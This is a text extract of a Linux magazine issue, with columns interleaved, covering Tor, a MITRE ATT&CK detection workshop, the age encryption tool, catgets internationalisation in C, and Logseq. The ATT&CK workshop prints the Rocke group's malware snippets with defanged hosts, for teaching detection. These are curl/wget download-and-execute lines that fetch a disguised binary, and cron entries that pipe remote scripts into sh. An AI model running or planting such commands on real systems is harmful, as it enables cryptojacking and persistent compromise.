Its now very high profile due in no small
part to the Tor Browser, which is based
on Mozilla Firefox and uses the Tor net-
work for Internet access. In addition, the
Tor network provides access to the Deep
Web and also to the Dark Web.
The Tor network operates with thou-
sands of servers through which it routes
all traffic. Data packets pass through
three servers, known as relays. The re-
lays work in a similar way to proxies,
with the data path constantly changing.
Instead of fixed cascades, variable paths
are used. In addition, the data is fully
Figure 8: You can view and modify the routes your data takes in the Tor encrypted.
Browser.

28 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 REVIEW
Overlay Networks

Due to the encryption mechanism, would with any regular web browser. files with the greatest possible anonym-
which cryptographically processes the You can see the specific route taken by ity, others focus on anonymous browsing
data multiple times, this type of data the web pages opened in the browser by on the conventional Internet. Others
transfer is also called onion routing. clicking the icon with the padlock on have embraced truly anonymous com-
Step-by-step encryption prevents track- the left in the URL bar. In an overlap- munication using conventional technolo-
ing of data packets, because each node ping small window, you will then see gies such as email, chat, or IRC.
only performs one encryption step. Un- the three nodes through which the data What all overlay networks have in
less additional end-to-end encryption is routed (Figure 8), with the entry common is that they actually make it
of the data is enabled, only the last server highlighted as the guard. This more difficult to inject malicious or spy
node sees the transported data packets server remains the same for a few code into the individual applications
in the clear [11]. months, while the other two relays thanks to free licenses and the resulting
The Tor Browser further increases the change for each new web page you ac- free availability of the source code. As a
user’s anonymity by providing different cess. However, if necessary, you can user, however, you need to investigate in
levels of security. By default, the HTTPS switch the last two relays for each open detail each overlay network in advance,
Everywhere and NoScript add-ons are web page on the fly by clicking the New especially if you are using the Dark Web,
also enabled. Moreover, the Tor Browser Circuit for this Site button. in order to be sure of obtaining a com-
isolates every web page visited and also The Tor Browser also gives you access munications solution that is truly hard-
blocks the Flash video format, which is a to content hosted on the Tor network. ened against a wide variety of attack sce-
security risk. Besides this, the Tor This content available on the Deep Web narios through a combination of differ-
Browser lets you switch data transfer [12] is not accessible for conventional ent security mechanisms. Q Q Q
routes at the push of a button to provide Firefox variants or other web browsers.
additional security. Although the Tor The Deep Web contains only non-in- Info
Browser is based on and compatible dexed web pages that conventional [1] hide.me: https://hide.me/en/
with Firefox ESR, the developers advise search engines do not list. [2] hide.me transparency reports:
against integrating other plugins into the The often-cited Dark Web forms just a https://hide.me/en/blog/leon-juranic-
browser, as they may contain security small part of the Deep Web, which is dis- certifies-hide-me-as-one-of-the-most-
vulnerabilities. tinguished from it by special additional private-vpn-provider/
The Tor Browser comes with the client cryptographic mechanisms. In this case, [3] I2P network: https://geti2p.net/en/
infrastructure required to connect to the the transmission of hosted data is en- [4] IPFS: https://ipfs.tech
Tor network. You will find countless lan- crypted, and the channels involved for
[5] IPFS on GitHub:
guage variants of it on the project’s web- communication are established through
https://github.com/ipfs/ipfs
site. For all the individual variants, 32- various servers on the Tor network using
[6] Almonit: http://almonit.club/#/
and 64-bit versions are available. hashes. This means that the computers
[7] IPFS Search:
Unpack the downloaded tarball in any involved in the communication remain
https://ipfs-search.com/#/
folder. You will then find the Tor Browser completely anonymous.
launcher in the newly created folder There are various search engines such [8] IPSE: https://www.ipse.io
tor-browser_en/ (for the English lan- as Torch [13] or Candle [14] to help you [9] Retroshare: https://retroshare.cc
guage variant). Double-clicking on it find Deep Web pages on the Tor net- [10] Tor project:
opens the browser and displays a con- work. By default, however, the Tor https://www.torproject.org
nection dialog. In the dialog, press the Browser uses DuckDuckGo, which is [11] Info on onion routing: https://en.
Connect button to connect to the Tor net- also Deep Web-enabled. wikipedia.org/wiki/Onion-Routing
work. Checking the Always connect au- [12] Notes on the Deep Web: https://en.
tomatically option lets you automate the Conclusions wikipedia.org/wiki/Deep_Web
process of opening the connection for fu- Overlay networks on the Internet con- [13] Torch:
ture use of the browser. tribute significantly to anonymous com- https://torchsearch.wordpress.com
The browser opens the DuckDuckGo munication. They target different audi- [14] Candle: https://freedeepweb.
search engine as the home page. You can ences here. While some P2P networks blogspot.com/2019/03/candle-search-
now work with the Tor Browser as you are simply about transferring individual engine.html

QQQ

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 29

IN-DEPTH
MITRE ATT&CK Workshop

Working with the MITRE ATT&CK knowledge base

Detective Work
The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We’ll show
you how to use that information to look for evidence of an attack. By Franciszek Pokryszko

S
ecurity has many facets and an- gain access for crypto mining [2][3][4][5]. attack is not as easy as it might seem, but
gles, and if you really want to be This group has been operating since 2018 luckily, you can turn to the MITRE
safe, you need to be aware of and is dynamically developing its arsenal. ATT&CK framework. Some of the tech-
them all. One important skill is The group evolves quickly and changes niques that MITRE ATT&CK associates
to become familiar with the logfiles on its techniques. Analysis of a Rocke group with the Rocke group include:
your system and the information they
might reveal (see the box entitled “All About Logs
About Logs”). But the attackers have
Linux systems store data in logfiles. You twists in the Bash shell. Text processing
become increasingly sophisticated in re- commands like grep and awk are popular
can specify four main categories of logs:
cent years, and to stay ahead of them, applications, events, services, and sys- tools for searching out log information.
you need all the help you can get. An- tems. Most logs are stored as text. Entries These tools are especially useful for
other important source of information is typically include important information quick, one-liner queries. The use of
the MITRE ATT&CK website [1]. MITRE such as: time, type, and severity levels of scripts will save time and make it easier
ATT&CK is a structured, globally avail- the event, as well as the name of the pro- to extract valuable data from logs.
able knowledge base describing tactics cess and the Process ID (PID). Of course, An example of a simple uniform script is:
and attackers. In addition to tracking the there are also exceptions, such as wtmp or
various attack methods used in the wild, lastlog which have a binary format. Gen- grep -E -r -o "([0-9]{1,3}\.)U

MITRE ATT&CK also provides clues that erally, files with logos are available in the {3}[0-9]{1,3}" | sort | uniq | U
will help you look for evidence. /var/log directory, but not always. It hap- grep -E -o "([0-9]{1,3}\.)U
Photo by Volodymyr Hryshchenko on Unsplash

pens that some programs save their diary {3}[0-9]{1,3}" > our-data.txt
files in other places.
Searching for Evidence
It’s best to learn from examples. One In the event that systemd operates on The grep command uses a regular ex-
threat facing users today is attacks related your Linux system, many users reach for pression (the -e switch allows you to
to stealing system resources for the pur- the journalctl command, which displays search with regex) to search data in the
the messages of the systemd recorder. catalogs recursively (switch -R) and then
poses of mining cryptocurrency. The
techniques that hackers use are quite in- When diagnosing problems or errors, displays the matched data parts in a sep-
teresting and sometimes unconventional. the first thing you need to do is to check arate line. The sort command sorts data,
The Rocke group is a good example. the logs. Searching for something in logs and the uniq command deletes dupli-
can be boring and time consuming. That cates. Then the result of this operation is
Rocke is a Chinese group of cyber crimi-
is why many users prefer to use simple saved to the our-data.txt file.
nals who specialize in malware attacks to

30 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
MITRE ATT&CK Workshop

• T1036.005 – Masquerading: Match to be. The following command will find netstat -tupln

Legitimate Name or Location every executable file and check its con-
• T1053.003 – Scheduled Task/Job: Cron trol sum (SHA256), and the results will This command will return information
• T1574.006 – Hijack Execution Flow: be saved to the list.txt file: on connections (port and IP address) to
Dynamic Linker Hijacking and from the system. You can trace the
The following sections takes a closer find -type f -exec sha256sum U connections that are set and then track
look at these techniques and what to do '{}' \; > list.txt down the most undesirable ones.
about them, but before delving into the Another way to check for a masked
details, remember that it is always a T1036.005: Masquerading process is with the ps command:
good idea to look for suspicious files. Suppose the group downloads a payload
Malware often creates files in the fol- using the curl or wet command. The ps auxf

lowing directories: configuration file and the malware bi-

• /usr/local nary file are saved in the /tmp directory This command will display a list of pro-
• /usr/sbin called kthrotlds. The launch malware is cesses running in the system. A mali-
• /tmp using the nohup command, rejecting the cious process often appears in square
It is worth looking at these locations and output data and enabling the back- brackets, meaning that there are no ar-
checking if there are suspicious files in ground binary file to be made. Perform- guments at the command line and it is
them. You might find file names similar ing this process is a form of masking. possibly running as a thread.
to the correct ones, and sometimes a file The system will constantly perform a
might be generated automatically and process called kthrotlds, but the pro- T1053.003 – Cron
take a series of numbers. It is good to cesses will not use binary files in the / Hackers use a variety of techniques to
check the hash of these files. If the hash tmp folder. achieve persistent access to the system
is different from what it is supposed to Listing 1 shows part of the malicious after restarting. One of these methods
be, that is an indication that the file has code. is to add tasks to the cron tool. Cron
been replaced or tampered with. You can By default, Linux does not log infor- allows you to plan your tasks and gives
use the VirusTotal platform [6] to check mation on open ports and connections. you the ability to follow commands ac-
whether the hash is what it is supposed However, netstat comes to the rescue: cording to the schedule without
IN-DEPTH
MITRE ATT&CK Workshop

Listing 1: Malicious Code Conclusion

01 if [ ${ARCH}x = "x86_64x" ]; then
In these examples of mali-
cious software used by the
02 (curl -fsSL hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -o \
Rocke group, you can see
03 /tmp/kthrotlds||wget -q hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -O \
that there are ways to spot
04 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds the presence of an attack.
05 elif [ ${ARCH}x = "i686x" ]; then Malware groups constantly
06 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ improve their techniques,
07 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
and the threat is still grow-
ing. In this type of attack,
08 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
it is worth focusing on
09 else
simple things. You should
10 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ also remember to reduce
11 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ the threat area by comply-
12 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds ing with best practices,
13 fi
such as installing system
and program updates,
14 nohup /tmp/kthrotlds >/dev/null 2>&1 &
using safe password poli-
cies, restricting access to
logging into the system. Listing 2 T1574.006 – Dynamic services and hardware, and monitoring
shows a few crontab entries that could Linker Hijacking system resources. Q Q Q
execute malicious code. Malware can run its own payloads by
In this case, the attacker does two taking over environmental variables and Info
things: loading shared libraries. LD_Preload [1] MITRE ATT&CK:
• Adds a new crontab entry that points forces binary files to charge specific li- https://attack.mitre.org/
to a malicious script. braries before others, enabling pre- [2] Pro-Ocean: Rocke Group’s New Cryp-
• Places the malicious script in a loaded libraries to overwrite any func- tojacking Malware:
folder, which will allow it to execute tion from any library. One way to use LD_ https://unit42.paloaltonetworks.com/
at a specific time defined in the Preload is the addition of a crafted li- pro-ocean-rocke-groups-new-
crontab entry. brary to /etc/ls.so.preload. Rocke mod- cryptojacking-malware/
That is why it is always worth checking ifies /etc/ld.so.preload, a configuration [3] Malware Used by Rocke Group
cron tasks to look for suspicious entries: file that injects the shared objects to the Evolves to Evade Detection by Cloud
processes performed in the Linux sys- Security Products:
crontab -l tem. Launching this file prevents you https://unit42.paloaltonetworks.com/
from checking a malicious process using malware-used-by-rocke-group-
Malware can manipulate the cron utility the ps command. Suspicious behavior evolves-to-evade-detection-by-cloud-
in various ways, therefore it is also can be initially detected using the fol- security-vproducts/
worth looking at the following locations: lowing command: [4] Rocke: The Champion of Monero Min-
• /var/spool/cron/root ers: https://blog.talosintelligence.com/
• /var/spool/cron/crontabs/root export 2018/08/rocke-champion-of-monero-
• /etc/cron.d/root miners.html
• /etc/cron.hourly/oanacroner The command will show variables in the [5] Rocke Evolves Its Arsenal with a New
• /etc/cron.daily/oanacroner system. A record related to malware Malware Family Written in Golang:
• /etc/cron.monthly/oanacroner could appear on the list: https://www.anomali.com/blog/rocke-
Or perform a search to find other cron- evolves-its-arsenal-with-a-new-
related files and directories on your declare -x LD_PRELOAD= U malware-family-written-in-golang
system. "/usr/local/lib/libntpd.so" [6] VirusTotal: https://virustotal.com/

Listing 2: Crontab Entries

01 "*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh

02 ##"

03

04 "*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh

05 ##"

QQQ

32 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

IN-DEPTH
Command Line – Modern File Encryption

A partial replacement for PGP/GPG

Coming of Age
Age, a modern encryption tool, could soon replace PGP
and GPG when it comes to file encryption. By Bruce Byfield

I
f you encrypt, you are probably fa- PGP and GPG require numerous choices, in PGP have gone unaddressed for over
miliar with Pretty Good Privacy including the encryption method, the key a decade because of this.” Because of
(PGP) [1] or its clone GNU Privacy size, and how long the key is valid. Even all these problems, PGP and GPG most
Guard (GPG). Most likely, you have a moderately skilled user can be hard- likely lack what cryptography experts
used one of these tools to generate pub- pressed to answer such questions intelli- called “forward secrecy” – the ability
lic and private keys and to encrypt email gently. As a result, users may simply fall to function today in the way in which
and files. The Free Software Foundation back on the defaults, although ignorance they were originally intended. In fact,
explains these tools in its Email Self-De- and security are hardly compatible. Many John Hopkins cryptographer Matthew
fense Guide as a first step towards pri- users, too, complain about having to Green declared as early as 2014 that
vacy [2]. However, despite PGP and GPS move the cursor around to generate suffi- “It’s time for PGP to die” [5].
being ubiquitous when it comes to pri- cient randomness – and, the longer the Age is designed as a partial replace-
vacy, some people believe that these key, the longer it takes to generate the ment for PGP and GPG. It is not a com-
tools are counter-productive and little randomness. To further add to the confu- plete replacement, because it lacks a wiz-
more effective than the feeble default sion, PGP and GPG do too many things, ard and does not manage keyrings or
protection available for PDF files when it such as signing services and key manage- many other aspects of encryption. Rather,
comes to modern computing. Ironically, ment, that many users have no interest in keeping with the Unix philosophy that
as PGP and GPG become more widely in, which can add to the confusion. a command should do one thing very
used, some security experts are advocat- Even more important, PGP and GPG well, age only creates keys and encrypts
ing for their replacement with Actual were first written in 1991, and they are files. Age offers a few other advantages:
Good Encryption (age), at least for file showing their age. They come from an • Functions are kept simple by using
encryption [3]. era in which cryptography was in its only default configurations
Why do some security experts claim infancy. The Latacora corporate blog • Small keys
that PGP and GPG are obsolete? To begin [4] complains about the “absurd com- • No configuration options to under-
with, PGP and GPG have long public keys plexity” that includes eight different stand
that can be difficult to work with when ways of encoding the length of a • Public and private key pairs and pass-
space is limited, and copying them accu- packet and three different compression words, with multiple recipients
rately by hand is difficult. In particular, formats, as well as “keys and subkeys. • The option for encrypted identity files
they can be difficult to configure, even Key IDs and key servers and key signa- • Encryption via PEM-encoded, ASCII-
when the simple configuration wizard is tures. Sign-only and encrypt-only. Mul- armored format (the current industry
used (Figure 1). When generating a key, tiple ‘key rings’. Revocation certifi- standard) [6]
cates.” Likening PGP and GPG to a • Encryption for SSH keys, including
Author Swiss army knife that has multiple GitHub .keys support
Lead Image © photonphoto, 123RF.com

Bruce Byfield is a computer journalist and functions but does few of them well, The result is a simpler, easier to under-
a freelance writer and editor specializing the blog states baldly, “No competent stand approach to encryption that meets
in free and open source software. In crypto engineer would design a system the highest modern standards.
addition to his writing projects, he also that looked like PGP today, nor tolerate
teaches live and e-learning courses. In his
spare time, Bruce writes about Northwest
most of its defects in any other design. Using Age
Coast art (http://brucebyfield.wordpress.
Serious cryptographers have largely Age is available in most modern distri-
com). He is also co-founder of Prentice given up on PGP and don’t spend butions. Compared to PGP, it is radi-
Pieces, a blog about writing and fantasy at much time publishing on it any- cally simple, with no options for key
https://prenticepieces.com/. more (…). Well-understood problems size or choice of algorithms (Figure 2).

34 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Command Line – Modern File Encryption

A Payload Without a
Delivery System
In its current state, age might be com-
pared to a missile, whose payload is
ready, but whose delivery system is
still in development. Age offers a sim-
ple and advanced means of encryption,
but it remains largely unknown and
unused. This state of affairs is very ob-
vious: When you make a mistake, age
responds with “Did age not do what
you expected? Could an error be more
useful? Tell us: https://filippo.io/age/
report.” Moreover, current documenta-
tion is minimal, and age leaves the lo-
cation of key files and the entry of re-
cipients up to users to decide. In addi-
tion, it does not yet provide any key
management.
Another obstacle to age’s adoption is
that while its advantages are well-known
to many cryptographers, desktop and
distribution developers are still focused
on making PGP accessible to average
users. This basic disconnect among de-
Figure 1: PGP can be difficult for non-cryptographers to configure intel- velopers still needs to be bridged.
ligently. For this reason, if you choose to use
age, you need to be prepared to work out
Before using age, all you must do is cre- age -r RECIPIENT-KEY U the delivery system by yourself. While
ate a public and private key. The keys INPUT-FILE OUTPUT-FILE.age not difficult, this approach is a little
can be stored in a plain text file, but rough and ready, so if you want modern
you should, of course, add a passphrase All these elements must be present for the and secure encryption, be prepared.
to the file, or else you have compro- command to function. To send to more When using age, you are using a com-
mised the keys from the beginning. To than one recipient, add multiple -r options mand still in rapid development. Q Q Q
do this, enter: or else store a list of recipients in a file and
add the path to the file using the -R option Info
age-keygen | age -p > KEY-FILE.age if you are using a recent version of age. [1] PGP: https://en.wikipedia.org/wiki/
Note that the -R option may not be avail- Pretty_Good_Privacy
If you choose an auto-generated pass- able in some distributions’ repositories.
[2] Email Self-Defense Guide:
phrase, age provides an xkcd-style pass- Similarly, to decrypt a file, enter:
https://emailselfdefense.fsf.org/en/?
phrase [7] consisting of a series of ran-
pk_campaign=fsfhome
domly generated words, which is easier age -d -i KEY-FILE.txt U
to remember than a random set of upper -o OUTPUT-FILE ENCRYPTED-FILE [3] age: https://github.com/FiloSottile/age
and lowercase letters, numerals, and [4] Latacora blog: https://latacora.singles/
special characters. Age does not support ssh-agent, but it 2019/07/16/the-pgp-problem.html
Each file to encrypt can be given its does work with sh-rsa and ssh-ed25519 [5] Mathew Green:
own xkcd-style passphrase. However, to SSH public keys. Using curl and a key
https://blog.cryptographyengineering.
avoid unnecessary complication, you listed in a GitHub profile, age can also
com/2014/08/13/
only reference the file that the key is send an encrypted file to a GitHub user,
whats-matter-with-pgp/
stored in. To add the key for a recipient as follows:
who has your public key, the file to be [6] age: https://github.com/C2SP/C2SP/
encrypted, and the name of the output $ curl https://github.com/benjojo.keys | U blob/main/age.md
file, enter: age -R - example.jpg > example.jpg.age [7] xkcd passwords: https://xkcd.com/936/

Figure 2: In contrast to PGP, age only needs to be configured by generating public and private keys.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 35

 IN-DEPTH
catgets

Build multi-language support into your

Linux application with catgets

Translator

To make programs useful to a worldwide audience, you need to build in support for multiple
languages. Catgets is a tool that helps you reach beyond your mother tongue. By Jim Hall

O
ne way that programmers can program needs to print. The basic usage path, then catopen() will open that file.
help others use their software is is to open the catalog, fetch messages If not, then catopen() will look for the
to add multi-language support. from the catalog and print them, and message catalog file in the directories
I’m not talking about program- then close the catalog. specified with the NLSPATH environment
ming languages; I mean spoken lan- variable.
guages. For example, you may have writ- Opening and Closing a Programs can open multiple catalogs at
ten your open source program to print in- Catalog once, such as one catalog for error mes-
formation and error messages in English, Before you can use a message catalog, you sages, another for debugging information,
but what if your user speaks only Span- first need to open it. The catopen() func- and so on. Each new message catalog re-
ish? Does your open source program also tion opens a message catalog and returns a quires a separate call to catopen() to open
“speak” Spanish? What about German, catalog descriptor, which is similar to a file the catalog and get a descriptor. But most
French, Italian, and all the other lan- pointer. You’ll use this descriptor when you programs typically use just one message
guages spoken around the world? retrieve messages later using catgets(). catalog file and divide the messages into
To make programs truly useful, pro- The function call to catgets() asks for the message sets. I recommend using just one
grammers should support internationaliza- filename of a message catalog, plus a flag message catalog unless your program is
tion. An easy way to do that is with the that indicates if catgets() should use the really big and needs to organize a lot of
catgets library [1], the original Unix current language locale value. If the flag is different messages.
method for a program to retrieve messages set to NL_CAT_LOCALE, then catgets() will For example, to open a message cata-
Photo by Leonardo Toshiro Okubo on Unsplash

and other strings in the user’s preferred use the current language locale, which you log file called hello.cat, you would use
spoken language. The GNU library also in- might set with setlocale(). Otherwise, catopen() as follows:
cludes a similar function called gettext, catgets() will use the value from the LANG
which uses a different lookup method. environment variable. nl_catd cat;

Whereas catgets uses three values to look

up a message (the catalog, the message #include <nl_types.h> cat = catopen("./hello.cat",U

set, and the message number), gettext uses nl_catd catopen(const char *catalog,U NL_CAT_LOCALE);

the message itself as the lookup value. int flag);

Catgets provides an interface to fetch The catopen() function returns the cata-
strings from a special file called a catalog The catalog indicates the message cata- log descriptor as type nl_catd, or -1 to
[2] that contains all the messages your log you want to open. If this contains a indicate an error.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 37

IN-DEPTH
catgets

When you don’t need the message cat- #include <nl_types.h> print it:
alog anymore, you can close it with the int catclose(nl_catd cat); char msg;

catclose() function:
Fetching Messages with msg = catgets(cat, 2, 1, "Hello");

Listing 1: A sample message catalog catgets puts(msg);

$ This message file is in Klingon

To print a message to the user in the
$ A few phrases a program might use
user’s preferred spoken language, you Creating a Message
first need to retrieve a string from the Catalog
catalog. The catgets() function looks A message catalog is a kind of database
$set 1
up the message from the database file that contains all the messages for
using three telltales: the catalog, the your program. But you don’t create the
$ Yes
message set, and the message number binary file by hand. Instead, you write a
1 HIja'
within the message set. catgets() then plain text file using a custom syntax and
returns a pointer to the string from the a few special markers, and then use a
$ No
catalog, as follows: program to convert the text file into a
2 ghobe' catalog database file. In this way, the
#include <nl_types.h> catalog text file is basically the “source
$set 2 char *catgets(nl_catd cat, int set,U code” for your catalog database file.
int num, const char *message); In the source file, keywords start with
$ Hello a dollar sign. For example, $set defines
1 nuqneH If catgets() can’t find the message the start of a new message set, such as
number in the message set in the mes- $set 2 for the second message set.
$ Where is the bathroom? sage catalog, it returns a default A dollar sign followed immediately by
2 nuqDaq 'oH puchpa''e'?
string. By using a string as one of the a space or tab indicates a comment.
function arguments, your program will Translators might use these comments to
always have a make note of who last updated the file,
Listing 2: A Sample Program fallback message and what each string is supposed to
#include <stdio.h> to print. This also mean. Blank lines are ignored.
#include <nl_types.h>
makes your code To demonstrate how to define a message
more readable, catalog file, I’ll define a message catalog
because your for a sample program. For fun, I’ll define a
int
catgets() call few program messages in a made-up lan-
main()
contains the guage, Klingon, so that you can easily rec-
{
string it needs to ognize if the program is correctly looking
char *msg;
look up. up messages from the catalog or printing
nl_catd cat; For instance, the “fallback” messages from the call to
let’s say your pro- the catgets() function. You might create a
/* open the catalog */ gram needs to message catalog that defines a few strings
print the string such as Yes and No, and any other mes-
cat = catopen("./hello.cat", NL_CAT_LOCALE); “Hello” to the sages a program might need to print such
user. To look up as greeting the user and asking important
if (cat == (nl_catd) - 1) {
this message from questions (Listing 1).
the catalog, you When the file is complete, you can
puts("Cannot open message catalog, continuing anyway");
need to know two turn it into a message catalog with the
}
things: what is gencat command [3]. For example, the
the message set following command converts the input
/* fetch a message and print it */
this message is file hello.klingon into a catalog file
defined in, and called hello.cat:
msg = catgets(cat, 2, 1, "Hello"); what is the mes-
sage number in $ gencat -o hello.cat hello.klingon
puts(msg); the message set.
If “Hello” is the Putting It All Together
/* close the catalog */ first string in the Listing 2 shows how to use catgets in a
second message sample C program. The program first
catclose(cat);
set, you might needs to open the catalog file using ca-
use catgets() as topen(). For every string the program
follows to retrieve needs to print, I first need to retrieve
return 0;
the string from the string from the catalog using cat-
}
the catalog and gets(). When the program is done

38 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
catgets

using the catalog, a call to the cat- Extending the Program With this change, when you compile
close() function closes it. In this article, I have described a sim- and run the new program, you can let
Now when you compile and run the ple example with a hard-coded path to the NLSPATH environment variable de-
program, you will see the Klingon text the catalog file. To make this example termine where catopen() will find the
nuqneH instead of the default text Hello. more flexible, and to support multiple message catalog file. The NLSPATH vari-
spoken languages, you can omit the able uses certain flags to stand in for
$ gcc -o hello hello.o path to the message catalog in the ca- other values, such as %N for “the file it-
$ ./hello topen() function call and allow the self.” Let’s say you set the NLSPATH vari-
nuqneH program to look for a catalog file in able as NLSPATH=/path/to/messages/%N.
some location defined by the system When you run the program, it will look
Listing 3: Omitting the Path (Listing 3). for the hello.cat message file as /path/
#include <stdio.h>
to/messages/hello.cat. Q Q Q
#include <nl_types.h>
Info
[1] catgets() – Retrieve a Message from a Author
Message Catalog: Jim Hall is an open
int
https://www.ibm.com/docs/en/i/7.3? source software advo-
main()
topic=functions-catgets-retrieve- cate and developer,
{
message-from-message-catalog
char *msg;
best known for usabil-
[2] The message catalog files (the GNU C ity testing in Gnome
nl_catd cat;
Library): https://www.gnu.org/
and as the founder and
software/libc/manual/html_node/The-
/* open the catalog */ project coordinator of FreeDOS. At work,
message-catalog-files.html
Jim is CEO of Hallmentum, an IT executive
[3] The gencat program (the GNU C Li-
cat = catopen brary): https://www.gnu.org/software/ consulting company that provides hands-
("hello.cat", NL_CAT_LOCALE); on IT Leadership training, workshops, and
libc/manual/html_node/The-gencat-
program.html coaching.
IN-DEPTH
Logseq

Logseq links thoughts like synapses

Networked
Logseq, a knowledge database note-taking app, emulates its better-known competitor
Roam Research and even outperforms it in some instances. By Ferdinand Thommes

I
f you are looking for an open images, playing back audio and video, In addition to Emac Org mode, Log-
source note-taking app, the Inter- and viewing tables or web content. seq cites TiddlyWiki [6] and Roam Re-
net abounds with options ranging And then there are proprietary net- search as its influences. Logseq can be
from simple, plain text apps to worked knowledge bases such as Roam connected to the Excalidraw [7] virtual
ones that let you display a wide variety Research and Obsidian. whiteboard and the Zotero [8]
of media. Some users, who consider Logseq [2], licensed under the
special applications superfluous, find AGPL 3.0, offers an open source al- FUSE
editors such as Vim, Kate, or gedit to- ternative to Roam Research and Ob-
When you launch the AppImage under
tally up to the task. Fans of open sidian. It describes itself as an open
a recent Ubuntu 22.04 LTS, the system
source alternatives to the proprietary source knowledge management and col-
reports that the filesystem in userspace
top dog Evernote, currently in beta for laboration platform that puts privacy
(FUSE) is missing. This message is typi-
Linux [1], want apps that offer ad- first. In this article, I put Logseq through cally misleading, because modern dis-
vanced functions such as displaying its paces to see how it compares to its tributions have FUSE as part of their de-
proprietary competitors (see the “Alter- fault installation. The only thing missing
Alternatives natives” box). is an older library as an interface. If you
mistakenly run the command:
Obsidian, released under a proprietary
license, is the pioneer of networked
Logseq at Work
Logseq goes far beyond simply storing sudo apt install fuse
knowledge storage. In the open source
community, Roam Research [3] has a notes. Logseq saves notes written in
the package manager will remove a
Markdown or Emacs Org mode [5] as
Lead Image © prat kitchatorn, 123RF.com

strong presence. It costs around number of other important packages.

EUR160 (~$157) a year and stores data plain text files, making the stored data Instead, just install the libfuse2 pack-
in the cloud. Logseq covers a large part universally usable. In addition, Logseq age with a call to
of the functionality of Roam Research supports tasks, to-do lists, and journals.
and even outperforms its role model in It manages entries in blocks, which you sudo apt install libfuse2
some respects. If you rely on team ca- can link and visualize as a mind map
pabilities, you will want to take a look Logseq now launches without com-
using the Graph view to connect ideas.
at Notion [4]. Although Notion exclu- plaint. For other distributions, the App-
Logseq distinguishes between Page
sively works in the cloud, it offers cli- Image wiki explains how to install the
ent-side, end-to-end encryption.
graphs for single pages and the entire
missing packages [10].
graph for all entries.

40 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Logseq

Figure 1: The Logseq desktop app is similar to the web version. The sidebar on the left displays the hamburger
menu, while the sidebar on the right shows content, graphs, and help (both sidebars can be hidden).

literature manager (you must be work- officially on Android. Logseq’s underly- “FUSE” box). Logseq saves all your en-
ing in Zotero for the connection to ing Electron framework [9] results in the tries as separate files on your hard
work). application weighing in at around disk, where they remain under your
150MB. Such a large chunk of disk space control (Figure 2). Whether you run
Local Knowledge is a potential disadvantage, even for a Logseq as a web app or as a locally in-
Management tool with Logseq’s functionality. stalled application, the first order of
Logseq can be used as a web service or Logseq is quickly deployed, either as the day is to create a local folder in
as a desktop application (Figure 1) on an installation from the website, a your home directory to store all your
Linux, macOS, Windows, and soon Flatpak, or an AppImage (see the files. You can specify the same home

Figure 2: Each page or journal entry is saved as a text file in Logseq. You can open and edit the entries with a
Markdown app or any text editor.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 41

IN-DEPTH
Logseq

Shift + Enter creates a new line in the

same block. Under Settings | Version
Control, a Git-style feature lets you view
and restore previous versions of the con-
tent via File history (Figure 5).
If you enter a slash in a block, a con-
text menu will open with a long list of
options for formatting the block includ-
ing adding links, images, and a to-do
entry. The to-do entry creates a box at
the beginning of the block entry that,
when checked, crosses out the text and
marks it as done.
Right-clicking on a bullet point
opens a list of formatting options, in-
Figure 3: In the Settings | Editor, you can set preferences for how your cluding color formatting, converting
editor works. the block into a template, and more.
Among other things, you can move the
directory for both the web version and Flashcards, Graph view, and All pages, text located to the right of a bullet
the desktop application, which means as well your favorites or recently point to the right sidebar and keep
that changes to the web version are viewed items. The Flashcards option multiple notes in view at the same
replicated locally. Logseq is not case lets you create flashcards for revision time. If you left-click one of the bullets,
sensitive; Recipes and recipes will both purposes (Figure 4). To add a new you will only see the selected block,
take you to the same page. page, click the plus icon at the bottom which means you can edit it without
If you want to type without distrac- of the screen. distractions. Logseq lets you manipu-
tions, Logseq comes up fullscreen with late blocks in many ways. Among other
sidebars added to the left and right if Markdown or Org Mode things, blocks can be moved, ex-
